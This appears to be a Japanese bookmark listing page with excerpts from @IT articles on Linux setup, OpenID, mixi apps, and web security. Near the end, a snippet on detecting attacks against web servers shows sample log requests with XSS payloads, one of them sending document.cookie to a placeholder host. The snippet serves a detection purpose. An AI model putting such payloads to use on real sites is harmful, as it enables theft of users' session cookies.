WindowsのXサーバでFedora Core 5にアクセスするには - @IT
Windows用のXサーバでLinuxにアクセスするには(マルチウィンドウ編)やWindows用のXサーバでLinuxにアクセスするには(XDMCP編)で、WindowsのXサーバでLinuxのX Window Systemにアクセスする方法を説明した。 しかし、Fedora Core 5のX Window Systemは設定ファイルや設定方法が変わっているため、上記のページで紹介した方法ではアクセスできない。ここでは、XDMCPによってWindowsのXサーバでFC5にアクセスする方法を説明する。FC5のディスプレイマネージャはgdmがデフォルトなので、gdmを前提に話を進める。 XDMCPの設定は、GUIで行う場合[デスクトップ]メニューの[管理]-[ログイン画面]を選択する。rootのパスワードを入力すると、[ログイン画面の設定]ダイアログボックスが表示されるので、[リモート]タブを
まずは、mixiアプリを使ってみよう、作ってみよう
まずは、mixiアプリを使ってみよう、作ってみよう:基礎から分かる、mixiアプリ作成入門(1)(1/3 ページ) mixiのアプリ?それって何? 「mixiアプリ」は、iGoogleのガジェットのように、SNS「mixi(ミクシィ)」上に組み込まれて実行される、Webアプリケーションです。主に、JavaScript+XML+HTML+CSSで作ります(やり方によっては、Flashなども使える)。 誰でも開発でき、人が開発したmixiアプリを自分のマイページなどに自由に組み込むことができます。また、Webアプリケーションのため課金方式は異なりますが、iPhoneアプリのようにmixiアプリを作って公開することで報酬を得ることもできます。 mixiアプリは、2009年6月現在、オープンβ環境のみで利用可能となっています。正式版は、8月公開予定です(参考:「mixiアプリ」8月に正式公開 販売
rsyslogの導入
導入に必要な設定 syslogdの停止 rsyslogを標準syslogデーモンとして利用するため、syslogdを停止します。またsyslogdが自動起動しないよう、停止処理を行います。 自動起動の解除にはchkconfigコマンドを使用していますが、ntsysvやサービス設定ツールを使っても同じように自動起動解除ができます。サービス設定ツールは「デスクトップメニュー→システム→管理→サーバ設定→サービス」で実行できます。 # /etc/init.d/syslog stop ←syslogdの停止 # chkconfig --level 123456 syslog off ←syslogdの自動起動解除 # chkconfig --list syslog ←確認 syslog 0:off 1:off 2:off 3:off 4:off 5:off 6:off ←す
連載記事 「Linuxトラブルシューティング探偵団」
【 pidof 】コマンド――コマンド名からプロセスIDを探す (2017/7/27) 本連載は、Linuxのコマンドについて、基本書式からオプション、具体的な実行例までを紹介していきます。今回は、コマンド名からプロセスIDを探す「pidof」コマンドです。 Linuxの「ジョブコントロール」をマスターしよう (2017/7/21) 今回は、コマンドライン環境でのジョブコントロールを試してみましょう。X環境を持たないサーバ管理やリモート接続時に役立つ操作です 【 pidstat 】コマンド――プロセスのリソース使用量を表示する (2017/7/21) 本連載は、Linuxのコマンドについて、基本書式からオプション、具体的な実行例までを紹介していきます。今回は、プロセスごとのCPUの使用率やI/Oデバイスの使用状況を表示する「pidstat」コマンドです。 【 iostat 】コマンド――I
Linuxに勝てなかったPlan 9 - @IT
2002年頃、とある雑誌でPlan 9の記事を6ページほど作ったことがある。冷静に考えると、とても流行するようには思えなかったのだが、私にはPlan 9はまぶしく輝いて見えた。それは紛れもなく未来のUNIXだったし、日々コンピュータやネットワークを利用する環境として、ぜひとも使いたいと思えるような機能が多くあった。 「Plan 9」(プラン・ナイン)はUNIXが生まれたベル研究所で、次世代UNIXとして開発されていた分散OSだ。UNIXやC言語を生み出したケン・トンプソン、デニス・リッチー、ロブ・パイクらのチームが、当時UNIXが抱えていた限界を打ち破るために、ネットワークやGUIを最初からUNIXの設計思想に基づいて取り入れた先進的なOSだった。それは、未来のUNIXとなるはずだった。 UNIXの大きな特徴として、デバイスをファイルにマッピングして抽象化するというものがある。各I/Oポー
OpenID Authentication 2.0時代の幕開け
長くて覚えられないURLは覚えなくてもよい OPから提供されるエンドユーザーのIdentifierには非常に長いものがあります。例えばベリサインのPIPというOPが提供するIdentifier URLはとても長いです。筆者のIdentifierは、 ですが、この長い文字列をテキストとして入力するのは面倒ですし、タイプミスして認証できないといったことにもなりそうです。われわれのようなIT業界の人間ならともかく、一般人にこういったURLを一字一句覚えてタイプさせるという苦行を行わせるのはあまりに酷でしょう。これはPIPに限った話ではなく、例えばYahooが提供するOpenIDによるOP-Local Identifier(http://my.yahoo.com/username)も十分長い文字列です。 OpenID Authentication 2.0では、より一般ユーザーが使いやすいIdent
Webアプリケーションを作る前に知るべき10の脆弱性 ― @IT
Webアプリケーションが攻撃者に付け込まれる脆弱性の多くは、設計者や開発者のレベルで排除することができます。実装に忙しい方も、最近よく狙われる脆弱性のトップ10を知ることで手っ取り早く概要を知り、開発の際にその存在を意識してセキュアなWebアプリケーションにしていただければ幸いです。 Webの世界を脅かす脆弱性を順位付け OWASP(Open Web Application Security Project)は、主にWebアプリケーションのセキュリティ向上を目的としたコミュニティで、そこでの調査や開発の成果物を誰でも利用できるように公開しています。 その中の「OWASP Top Ten Project」というプロジェクトでは、年に1回Webアプリケーションの脆弱性トップ10を掲載しています。2004年版は日本語を含む各国語版が提供されていますが、2007年版は現在のところ英語版のみが提供さ
ログを基にSQLインジェクションの痕跡を検出、IPAが無償検査ツール - @IT
2008/04/18 情報処理推進機構(IPA)は4月18日、WebサイトにSQLインジェクションの脆弱性が存在するかどうかを検出できる簡易検査ツール「iLogScanner」を公開した。IPAのWebサイトから無償でダウンロードできる。 iLogScannerは、Webブラウザ上で実行するJavaアプレット形式のプログラムだ。Webサーバのアクセスログを検査し、攻撃によく用いられる文字列を検出する。Webサイトが日頃どのくらいの頻度で攻撃を受けているかに加え、攻撃が成功した可能性についても検出できる。 解析可能なアクセスログは、IIS5.0/6.0のW3C拡張ログファイルタイプおよびApache HTTP Server1.3系/2.0系/2.2系のcommonタイプ。iLogScanner自体はWindows XP SP2上のInternet Explorer 7で動作する(JRE 5.
純国産のソーシャルアドレス帳「Ripplex」のすごいところ ― @IT
2008/02/29 mixiやGmail、Windows Messenger、携帯メール、私たちは日々かなりの数のコミュニケーションツールを使いこなしている。電話やファクシミリなどを含めると、多くの人は10以上のコミュニケーションツールを使っていることになるだろう。その時々に応じて最適な連絡方法が選べるのは便利だが、誰にどのようにして連絡を取ればいいのか混乱することも多い。2007年12月末に1.0をリリースしたアドレス帳ツール「Ripplex」は“自ら育つ”をキーワードにコミュニケーションツールの問題を解決しようとしている。 関連記事:あるテクノロジ・ベンチャーの肖像―リプレックスは「穴を掘る」 RipplexはmixiのIDや複数の電子メールアドレス、携帯電話番号、携帯メールアドレスなどを管理できるアドレス帳ツール。複数のPC間で情報を同期したり、既存の環境からID情報をインポートす
仕様から学ぶOpenIDのキホン - @IT
にわかに注目を集めている、URLをIDとして利用する認証プロトコル、OpenID。本連載ではこのプロトコルの仕組みを技術的に解説するとともに、OpenIDが今後どのように活用されていくのかを紹介する(編集部) OpenIDってなんだろう? 現在、国内外でにわかに注目されつつあるOpenIDという仕組みを聞いたことがあるでしょうか? これはユーザー中心の分散ID認証システムですが、まだ日本での普及は進んでいない状況です。 これにはいくつか原因が挙げられるでしょうが、筆者はOpenIDが正しく理解されていないことが原因だと考えます。 本連載ではOpenIDの現行仕様、およびその拡張仕様とともに、実装を例に取りつつOpenIDとは何かということを明らかにしていきます。最終的にはOpenIDが切り開く未来を見るため、現在策定中の次期仕様についても触れていきたいと思います。 広がりつつあるブラウザベ
Ajaxをコーディングレスで作成するAjaxBuilder - @IT
Google Mapsへの驚きから始まったAjaxブームは、とうとうAjaxを基盤技術として国産ソフトウェアベンダまで生み出した。株式会社HOWS(ハウズ)は、あのBiz/Browserを生み出したアクシスソフトの創業者である大塚裕章氏が新たに起業したベンチャーである。 同社の主力製品はAjaxBuilderだ。AjaxBuilderはAjaxを利用したWebアプリケーションをGUIで構築できる開発ツールで、そのライトバージョン(基本機能のみを提供)が年内に出荷される予定だ(2005年11月現在)。 ■コードを1行も書かないAjax開発ツール AjaxBuilderは、GUIのインターフェイスのみでAjaxアプリケーションを構築できるユニークなツールだ。Ajaxアプリケーションでよく利用されるコードがコンポーネントで用意されているため、アプリケーション作成者は、これらを組み合わせるだけでA
Ruby on Railsのチームから学ぶ仕事術
Ruby on Rails自体についての解説は、「WebプログラマはRailsに乗るべきか?」や、「Rubyでアジャイルプロトタイピング」にもありますので、そちらもぜひご覧ください。本記事は2006年に執筆されたものです。RubyやRuby on Rails全般の最新情報は@IT Coding Edgeフォーラムをご参照ください。 素早く開発が行えるRuby on Railsに驚くとともに、Railsのプロジェクトの素早さの根源はどこにあるのか不思議に思った人も多いことでしょう。 Ruby on Railsの開発には、37singals社のDavid Heinemeier Hansson氏を中心とする11名で構成されたチームがかかわっています。 Core team behind Ruby on Rails Ruby on RailsによるWebアプリケーション構築風景を撮影したいくつかのス
Webサーバへの攻撃を見抜く
GET /sample.cgi?language=ja&country=JP &page=<script>alert('foo')</script> HTTP/1.1 GET /cgi-bin/sample.cgi?A=execute&U=&CF=search-simple &nv=ie&S=%3Cscript%3Ealert%28%22test%22%29%3B%3C%2F script%3E&So=RDATE&Sp=AND GET /cgi-bin/sample.cgi?doc=<%73cr%69pt>document.location= ('http://example.com/test.php?c='+document.cookie)<%2f%73 %63%72%69%70t> sample.cgiはWebフォームで、入力された文字に対して全くチェックを行っていない脆弱なcgiとす
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Fedora CoreでIPv6を無効にするには - @IT
連載記事 「Linux Kernel Watch」 - @IT
連載:Ajax時代のJavaScriptプログラミング再入門 ― @IT
Windows上のファイルにLinuxからアクセスするには(mount.cifs編) - @IT